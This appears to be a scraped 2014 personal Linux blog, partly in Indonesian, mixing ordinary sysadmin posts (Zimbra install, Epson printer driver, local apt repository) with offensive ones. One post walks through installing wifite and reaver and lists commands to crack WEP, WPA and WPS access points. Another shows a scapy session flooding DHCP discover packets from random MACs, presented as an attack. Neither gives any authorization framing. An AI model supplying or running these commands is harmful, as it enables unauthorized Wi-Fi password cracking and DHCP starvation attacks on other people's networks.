Mulyana Sandi

Belajar menulis dan berbagi ilmu melalui blog, sedikit tulisan semoga menjadi banyak manfaat :D.

Star Bolic

Belajar menulis dan berbagi ilmu melalui blog, sedikit tulisan semoga menjadi banyak manfaat :D.

Home Mini Server and VoIP

Banyak sekali perangkat yang terselubung diantara ilmu yang bermanfaat, perangkat kecil dengan hasil yang gak bisa di taksir.

Mulyana Sandi

Belajar menulis dan berbagi ilmu melalui blog, sedikit tulisan semoga menjadi banyak manfaat :D.

Antenna Star Bolic

Menembus jarak dengan perangkat yang murah meriah namun memerlukan kreatifitas dalam pembuatannya.

Monday, June 16, 2014

How to Install Zimbra 8.0.2 on Ubuntu 12.04 LTS

Introduction

VMware Zimbra is an enterprise class email, calendar and collaboration suite designed for the cloud, both private and public. The flexibility, scalability and stability of Zimbra make it as a complete email solution that can be deployed in any environment either small or large. Zimbra email server can be accessed from the Zimbra Web Client, Zimbra Desktop offline client, Outlook and a variety of other standards-based email clients and mobile devices.
The three editions of Zimbra are:

1. ZCS Network Edition
2. ZCS hosted email by a Zimbra partner
3. ZCS Open Source Edition (free)

Components included with Zimbra Collaboration Server 8.0.2
  • Postfix - Free Mail Transfer Agent
  • MySQL - Database sofware
  • OpenLDAP - LDAP for User authentication
  • Jetty - Web application server
  • Lucene  - Test and search engine
  • ClamAV  - Antivirus scanner
  • SpamAssassin - Anti-spam software
  • Amavis (amavisd-new) - Content checker
  • Aspell - Spell checker
  • James/Sieve - Email filter

    Installation of Zimbra 8.0.2 Open Source Edition on Ubuntu 12.04 LTS

    Wednesday, June 11, 2014

    Reset the net

    Sunday, June 8, 2014

    Installing wifite and reaver on Ubuntu for brute force attacks against WPS

    Using wifite and reaver together gives us the possibility of obtaining WPA and WPA2passwords without using dictionaries.
    In this post we will see how to install both tools on a Ubuntu machine and a small demonstration of use. Wifite documentation recommends installing other tools  such aspyrytcowpatty and tshark in order to verify WPA handshakes, but in this case we’ll install only reaver, since it’s all we need to attack networks with WPS encryption.
    First we’ll download and install reaver:
    wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
    tar -xzvf reaver-1.4.tar.gz
    Before proceeding, we need to install auxiliary libraries:
    sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
    Finally, we proceed to the installation:
    cd reaver-1.4
    cd src
    ./configure
    make
    sudo make install
    Install wifite is equally simple:
    wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
    chmod +x wifite.py
    python wifite.py
    Usually wifite is used with any of the available options. In this example we are interested in finding WPS enabled networks and, therefore, we run the program with the option:
    python wifite.py -wps
    Automatically, wifite enables monitor mode on the network interface -obviously the device must have that capability- and scans looking for networks with WPS enabled. This process ends when they the user types Ctrl + C.
    Then we’ll be asked about our targets. The procedure can be seen perfectly in the figure below. When targets are selected, wifite will use reaver to run a brute force attack on them. Now all you need is patience.
    Atac wifite
    When the attack ends, wifite disables automatically monitor mode on the network interface and exits.
    Other examples of usage can be found on the official website of wifite. Here are some examples:
    • to crack all WEP access points:   ./wifite.py -all -wep
    • to crack all WPS access points with signal strength greater than (or equal to) 50dB:  ./wifite.py -p 50 -wps
    • to attack all access points, use ‘darkc0de.lst‘ for cracking WPA handshakes: ./wifite.py -all –dict /pentest/passwords/wordlists/darkc0de.lst
    • to attack all WPA access points, but do not try to crack — any captured handshakes are saved automatically: ./wifite.py -all -wpa –dict none
    • to crack all WEP access points greater than 50dB in strength, giving 5 minutes for each WEP attack method, and send packets at 600 packets/sec:/wifite.py –pow 50-wept 300-pps 600

    Source : http://www.hacking-etic.cat/?p=731&lang=en

    Saturday, May 10, 2014

    How to install Aircrack-ng and Wifite.


    1. Download Penbang - http://adf.ly/mNNNE - SAVE TO ~/
    2. Open Terminal - touch ~/wifite_installer
    3. Open that file and paste in the code from http://adf.ly/mNNSK
    4. Save, then go back to Terminal. - "chmod +x wifite_installer"
    5. Extract penbang.zip to the ~/
    6. Navigate to "~/penbang/netkit/aitrack-ng/source"
    7. Terminal - "sh install_aircrack.sh"
    8. Go through the setup. Yes to everything.
    9. Terminal - "cd ~/"
    10. Terminal - "./wifite_installer"
    11. Terminal "sudo apt-get install reaver tshark pyrit"
    12. You can delete all files downloaded EXCEPT wifite.py
    To run wifite - sudo python wifite.py

    Source : http://crunchbang.org/forums/viewtopic.php?id=30405

    Install Driver Epson ME 32 di Linux

    Berikut ini adalah proses instalasi driver printer  Epson ME 32 pada Linux

    Cari driver printer di http://avasys.jp/eng/linux_driver/
    Pilih paket yang sesuai dengan printer kita

    untuk printer epson bisa melalui link :  http://avasys.jp/eng/linux_driver/download/lsb/epson-inkjet/escp/
    atau bisa melalui link : http://download.ebz.epson.net/dsc/du/02/DriverDownloadInfo.do?LG2=EN&CN2=&DSCMI=16878&DSCCHK=4be73117a4e330f8f4b08216d6d243176481fae6

    Pilih jenis paket sesuai dengan Linux yang anda gunakan
    Nama FileFile size
    http://wajahsunda.com/repo/epson-inkjet-printer-n10-nx127-1.0.1-1lsb3.2.i486.rpm1.7 MB
    http://wajahsunda.com/repo/epson-inkjet-printer-n10-nx127_1.0.1-1lsb3.2_i386.deb1.7 MB
    http://wajahsunda.com/repo/epson-inkjet-printer-n10-nx127-1.0.1-1lsb3.2.x86_64.rpm1.69 MB
    http://wajahsunda.com/repo/epson-inkjet-printer-n10-nx127_1.0.1-1lsb3.2_amd64.deb1.68 MB
    http://wajahsunda.com/repo/epson-inkjet-printer-n10-nx127-1.0.1-1lsb3.2.src.rpm2.24 MB
    Jika link sudah tidak aktif, silahkan gunakan link resmi dari vendor 

    contoh yang digunakan
    epson-inkjet-printer-n10-nx127_1.0.1-1lsb3.2_amd64.deb

    Install paket driver
    untuk instalasi caranya buka terminal atau tekan (Ctrl+Alt+t) kemudian ketikkan perintah :

    mulyana@relawantik:~$ sudo dpkg -i epson-inkjet-printer-n10-nx127_1.0.1-1lsb3.2_i386.deb

    Kemudian enter dan printer epson ME 32 anda sudah siap digunakan.

    Driver ini juga bekerja pada printer :
    Epson ME 320, Epson ME 33, Epson ME 330, Epson ME 35, Epson ME 350, Epson Stylus N10, Epson Stylus N11, Epson Stylus NX125, Epson Stylus NX127, Epson Stylus S22, Epson Stylus SX125, Epson Stylus T12, Epson Stylus T13, Epson Stylus T22, Epson Stylus T22E, Epson Stylus T25, Epson Stylus TX120, Epson Stylus TX121, Epson Stylus TX123, Epson Stylus TX125, Epson Stylus TX129

    Thursday, May 8, 2014

    Pembantaian dengan Scapy

    root@hclinux:/home/mulyana# scapy
    INFO: Can't import python gnuplot wrapper . Won't be able to plot.
    INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
    WARNING: No route found for IPv6 destination :: (no default route?)
    INFO: Can't import python Crypto lib. Won't be able to decrypt WEP.
    INFO: Can't import python Crypto lib. Disabled certificate manipulation tools
    Welcome to Scapy (2.2.0)
    >>> conf.checkIPaddr = False
    >>> dhcp_discover = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="192.168.1.103",dst="255.255.255.255")/UDP(sport=80,dport=80)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
    >>> sendp(dhcp_discover, loop=1)
    .......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Sent 503 packets.
    >>> 

    Note : Hentikan serangan tekan CTRL+C , Keluar tekan CTRL + D, Ganti IP Target (src="192.168.1.103")

    Wednesday, May 7, 2014

    Cara Mudah Membuat Repo Lokal


    Install dpkg-dev
    root@mulyana:~#  apt-get install dpkg-dev

    Masukkan CD/DVD repo misal di mount di /mnt.
    root@mulyana:~# mount /dev/cdrom /mnt

    Copy semua file biner *.deb yang ada di /mnt/pool ke folder tujuan misal buat repo di /repo.
    root@mulyana:~# cp -R /mnt/pool /repo

    Lakukan hal yang sama untuk semua CD/DVD. jangan lupa untuk unmount dan eject CD/DVD setelah selesai.
    root@mulyana:~# umount /dev/cdrom && eject

    Masuk ke direktori tujuan repo, contoh /repo jalankan dpkg-scanpackages, semakin banyak CD/DVD, makin lama waktu yang dibutuhkan.
    root@mulyana:~# cd /repo
    root@mulyana:~# dpkg-scanpackages . /dev/null | gzip -9c > Packages.gz

    Selanjutnya, edit sources.list
    root@mulyana:~# nano /etc/apt/sources.list

    Tambahkan ini di baris teratas
    deb file:/repo ./

    Update repo.
    root@mulyana:~# apt-get update